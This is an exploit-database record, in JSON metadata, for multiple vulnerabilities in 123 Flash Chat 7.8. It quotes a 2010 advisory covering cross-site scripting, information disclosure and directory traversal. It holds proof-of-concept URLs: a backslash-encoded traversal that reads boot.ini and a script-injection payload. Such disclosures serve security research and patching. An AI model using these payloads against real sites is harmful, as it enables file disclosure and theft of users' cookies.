Description
123 Flash Chat 7.8 - Multiple Vulnerabilities
{"lastseen": "2020-04-01T19:03:59", "references": [], "description": "\n123 Flash Chat 7.8 - Multiple Vulnerabilities", "edition": 1, "reporter": "Lincoln", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-08-16T00:00:00", "title": "123 Flash Chat 7.8 - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-16T00:00:00", "id": "EXPLOITPACK:3E8CEE0A7E59C18B09DDEE54B9CF4213", "href": "", "viewCount": 4, "sourceData": "source: https://www.securityfocus.com/bid/42478/info\n\n123 Flash Chat is prone to multiple security vulnerabilities. These vulnerabilities include a cross-site scripting vulnerability, multiple information-disclosure vulnerabilities, and a directory-traversal vulnerability.\n\nAn attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, obtain sensitive information, or perform unauthorized actions. Other attacks are also possible.\n\n123 Flash Chat 7.8 is vulnerable; other versions may also be affected.\n\nhttp://www.example.com/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini\n \n \nhttp://www.example.com/index.html%27%22--%3E%3Cscript%3Ealert%28%22Corelan%22%29%3C/script%3E\n \n \nhttp://www.example.com/lite-chat-login.html", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645507180}}
{}